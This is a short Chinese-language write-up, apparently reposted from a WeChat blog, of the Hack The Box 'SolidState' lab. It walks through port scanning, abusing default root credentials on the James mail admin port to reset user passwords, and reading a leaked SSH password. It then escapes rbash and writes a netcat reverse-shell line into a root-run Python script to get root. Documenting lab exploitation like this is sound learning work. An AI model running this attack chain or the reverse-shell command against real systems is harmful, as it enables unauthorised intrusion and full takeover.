端口扫描
nmap -sV 10.10.10.51
目录扫描没发现什么
在探测版本发现了james
漏洞搜索
三个脚本都失败了,这是还是需要密码的,按照之前打的靶机,25 110这些端口应该会有利用条件的
打开脚本,发现4555端口,默认用户名密码都是root,显示链接成功,但是并未反弹shell
尝试登陆4555端口
还支持改密码,这样就可以对用户全部设置密码
user: james 123user: thomas 123user: john 123user: mindy 123user: mailadmin 123
登陆邮箱
登了四个账号,发现了有价值的东西了
一个账号密码
mindy
P@55W0rd1!2@
登陆ssh
81ed6eec489aa915b9701c2b26298856
用的rbash,逃逸rbash
ssh [email protected] -t bash
在root目录下存在root权限的py
支持nc,所以直接nc反弹
echo 'import os; os.system("/bin/nc 10.10.14.7 8888 -e /bin/bash")' > /opt/tmp.py
有定时任务,慢慢等,两分钟后获取root
b1257265f6a3e2a3b2ad63b95b75a1d9
原文始发于微信公众号(轩公子谈技术):HTB-Solidstate靶场
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论